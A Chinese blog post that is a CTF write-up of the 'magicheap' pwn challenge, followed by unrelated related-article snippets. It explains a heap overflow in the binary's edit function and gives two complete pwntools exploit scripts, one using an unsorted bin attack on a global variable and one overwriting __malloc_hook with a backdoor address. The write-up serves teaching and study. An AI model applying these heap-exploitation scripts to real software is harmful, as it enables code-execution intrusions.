MagicHeap-WP

最新推荐文章于 2023-04-29 19:32:31 发布
最新推荐文章于 2023-04-29 19:32:31 发布
阅读量253 收藏 1
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: CTF、pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/98480215
版权

保护

在这里插入图片描述

分析

  • 主要漏洞在编辑函数中,对输入大小没有检验,导致堆溢出

      unsigned __int64 edit_heap()
  {
    __int64 v0; // ST08_8
    int v2; // [rsp+4h] [rbp-1Ch]
    char buf; // [rsp+10h] [rbp-10h]
    unsigned __int64 v4; // [rsp+18h] [rbp-8h]
  
    v4 = __readfsqword(0x28u);
    printf("Index :");
    read(0, &buf, 4uLL);
    v2 = atoi(&buf);
    if ( v2 < 0 || v2 > 9 )
    {
      puts("Out of bound!");
      _exit(0);
    }
    if ( heaparray[v2] )
    {
      printf("Size of Heap : ", &buf);
      read(0, &buf, 8uLL);
      v0 = atoi(&buf);
      printf("Content of heap : ", &buf);
      read_input(heaparray[v2], v0);//堆溢出
      puts("Done !");
    }
    else
    {
      puts("No such heap !");
    }
    return __readfsqword(0x28u) ^ v4;
  }

  • 程序中还有一个后门

      int l33t()
  {
    return system("cat ./flag");
  }

  • 而在主函数中,明显想要调用这个函数的条件永为假。
    在这里插入图片描述

  • 因为magic是一个全局变量,存放在bss段中,并且结合堆溢出,最快的方法就是利用unsortbin attack修改magic的值。

  • 还有一种方法是利用unsortbin attackmain_arena+88放到bss段中,再利用fastbin attack分配得到bss段中的一个地址,使得我们可以将bss中的main_arena+88改为 __mallock_hook,再通过编辑操作,将 __malloc_hook里的内容改成后门地址

EXP

(一)

from pwn import*

p=process('./magicheap')

def addchunk(size,data):
    p.sendlineafter('choice :','1')
    p.sendlineafter('Heap : ',str(size))
    p.sendlineafter('heap:',data)
def editchunk(idx,size,data):
    p.sendlineafter('choice :','2')
    p.sendlineafter('Index :',str(idx))
    p.sendlineafter('Heap : ',str(size))
    p.sendlineafter('heap : ',data)
def freechunk(idx):
    p.sendlineafter('choice :','3')
    p.sendlineafter('Index :',str(idx))

magic=0x0000000006020C0
addchunk(0x80,'a'*8)#0
addchunk(0x80,'b'*8)#1
addchunk(0x30,'c'*8)#2
freechunk(1)
editchunk(0,0x80+0x20,'a'*0x80+p64(0x91)+p64(0x91)+'a'*8+p64(magic-0x10))
addchunk(0x80,'hack')
gdb.attach(p,'heap chunks')
p.sendlineafter('choice :','4869')
p.interactive()

  • 此时发现magic被修改成了main_arena+88

  • 在这里插入图片描述

  • (二)

      from pwn import*
  
  p=process('./magicheap')
  
  def addchunk(size,data):
      p.sendlineafter('choice :','1')
      p.sendlineafter('Heap : ',str(size))
      p.sendlineafter('heap:',data)
  def editchunk(idx,size,data):
      p.sendlineafter('choice :','2')
      p.sendlineafter('Index :',str(idx))
      p.sendlineafter('Heap : ',str(size))
      p.sendlineafter('heap : ',data)
  def freechunk(idx):
      p.sendlineafter('choice :','3')
      p.sendlineafter('Index :',str(idx))
  
  backdoor=0x0000000000400C23
  chunk_list=0x0000000006020E0+0x28
  addchunk(0x80,'a'*8)#0
  addchunk(0x80,'b'*8)#1
  addchunk(0x60,'c'*8)#2
  addchunk(0x60,'d'*8)#3
  addchunk(0x60,'d'*8)#3
  
  freechunk(1)
  pay='a'*0x80+p64(0x91)+p64(0x90)+p64(0)+p64(chunk_list)
  editchunk(0,0x80+0x20,pay)
  freechunk(4)
  addchunk(0x80,'e'*8)
  gdb.attach(p,'x/20gx '+str(chunk_list-0x20))
  pause()
  pay='f'*0x60+p64(0x71)+p64(0x70)+p64(0x602115)
  editchunk(3,0x60+0x18,pay)
  addchunk(0x60,'')
  addchunk(0x60,'\0'*3+p64(0x602118))
  editchunk(9,1,'\x10')
  editchunk(7,8,p64(backdoor))
  gdb.attach(p,'x/20gx '+str(chunk_list-0x20))
  pause()
  p.sendlineafter('choice :','1')
  p.sendlineafter('Heap : ','10')
  p.interactive()

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    • 到此,__malloc_hook已成功被修改为后门地址
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
ctf-pwn-堆—unsorted bin attack
最新发布
xy_369的博客
05-23 242
上面只需要知道unsorted bin实现了将栈上的一个变量值变为了main_arena结构体中的一个地址,这句话仅出于个人理解,从参考链接2里得到的理解。1、个人翻译过后的代码(翻译自参考链接2)3、删除部分打印函数的代码。
rtthread之小内存管理算法
loveliu928的博客
04-25 1485
计算机系统中,变量、中间数据一般存放在 RAM 中,只有在实际使用时才将它们从 RAM 调入到 CPU 中进行运算。一些数据需要的内存大小需要在程序运行过程中根据实际情况确定,这就要求系统具有对内存空间进行动态管理的能力,在用户需要一段内存空间时,向系统申请,系统选择一段合适的内存空间分配给用户,用户使用完毕后,再释放回系统,以便系统将该段内存空间回收再利用。 RT-...
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32)
cainiao78777的博客
04-29 251
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑堆块,根据bss段里的指针,来找到相应的堆块,然后输入大小,再填充内容,并未检测原本输入堆块内容的大小,那么此处存在堆溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
hitcontraining magicheap
pondzhang的专栏
06-16 354
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
小内存堆管理算法详细解析
fhqlongteng的博客
01-20 1502
1、小内存堆管理算法介绍 本文所介绍的内存堆管理是RT Thread操作系统中的小内存管理算法,参考mem.c源文件。这个程序适用于小内存的CPU,比如像STM32F这样的只有几十-几百KB内存的处理器。整个内存堆的处理算法简洁,高效,现对其中的原理做详细的介绍。首先先写上整个源代码,如下。内存堆的函数只有主要的4个函数:   rt_system_heap_init   rt_ma...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
NGINX-WP-Rocket:NGINX最佳WordPress性能增强器配置-WP Rocket Rock ..
05-12
-- NGINX-WP-Rocket NGINX-WP-Rocket是缓存插件的配置。 它使Nginx可以直接提供以前缓存的文件,而无需调用WordPress或任何PHP。 它还添加了标头来缓存CSS,JS和媒体,以便通过减少对Web服务器的请求来利用浏览器的...
雄迈摄像头模组50HV10PT-WP
08-20
雄迈摄像头模组50HV10PT-WP是一款专为视频监控领域设计的专业设备,其在硬件开发和集成方面具有显著的特点。该模组在众多应用中扮演着核心角色,为用户提供高质量的图像捕捉和实时传输能力。下面将详细探讨这款模组...
class-wp.php
06-06
使用WordPress撰写中文文章的时候,如果说在固定链接中选择加入一个%postname%项,生成的url就会因为含有中文而无法被支持,网站显示404。这是需要进行更改后的文件,可以解决问题。
java内存泄漏
YangYoung_的博客
10-10 1437
所谓的内存泄漏不是说内存坏掉了,内存溜出去了,而是因为线程进行中一直占用了某块内存无法进行GC,这块内存之后永远都无法被使用,导致这块内存像是没有了一样,嗯哼
[013] [RT-Thread学习笔记] 动态内存堆管理
柯西的彷徨的博客
02-10 926
# 引言 在[程序内存分布](https://blog.csdn.net/kouxi1/article/details/122860151?spm=1001.2014.3001.5502)中说明了ZI段的结束地址到RAM内存尾部的空间为RTT动态内存堆,本文主要说明RT-Thread**动态内存堆管理**算法,分析相关API源码,并给出示例代码以验证。 # 1 裸机系统动态内存 在启动文件`startup_stm32f103xe.s`中进行分配: ```assembly ;1-配置栈: 变量(局部/全
hitcontraining_magicheap buuctf
m0_57754423的博客
02-12 1251
这题的漏洞点在编辑heap: 可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。 我自己的思路是: 利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。 exp: from pwn import * p = remote("node4.buuoj.cn",25162) #p = process("./magicheap") e = ELF("./magicheap") sh_addr = 0x400c50 bss_addr
RT-Thread动态内存堆管理
mxh3600的博客
10-28 989
RT-Thread动态内存堆管理
magicheap
m0_48127441的博客
04-24 124
1 create 2 edit //存在溢出 3 del 4 exit 4869 只要0x6020A0 大于0x1305 执行后门 所以目标是修改该值 利用unsort_bin attack 弹出链表一项时需要进行 front now next front -> next = next next-> front = front 即 unsort_bins[0] --> bk = unsort_bins[0] --> bk -...
BUUCTF【hitcontraining_magicheap
weixin_51055545的博客
02-13 1669
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
buuctf magicheap
qq_42728977的博客
04-22 215
主要是unsorted bin 在拖链的时候的一些细节 参考
hitcontraining_magicheap
z1r0的博客
12-23 253
hitcontraining_magicheap 查看保护 magic <= 0x1305即可getshell。 edit的时候没有注意size,可以堆溢出,没有pie直接unstoredbin attack。具体的attack看我的blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remo
rt-thread的小内存管理算法分析
心碎乌托邦
08-10 4004
rt-thread的小内存管理是rt-thread操作系统默认堆内存管理算法,是一种简单的内存分配算法,当有可用的内存的时候,会从中分割一块来作为分配的内存,而剩下的则返回到动态内存堆中.此算法采用了一个静态链表来实现的,其源码文件在根目录下的src目录下,包含mem.c和mem.h两个文件. 1 数据结构 小内存管理算法将内存看成是一个个内存块: [cpp] v
虹润牌19--HR-WP-HZ单屏工频周波表技术手册
"19--HR-WP-HZ单屏系列工频周波表,虹润技术资料" 19--HR-WP-HZ单屏系列工频周波表是由虹润公司推出的智能仪表,专用于交流电工显示和控制。这款仪表具有全面的功能和高效的省配线解决方案,适用于各种工业环境中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值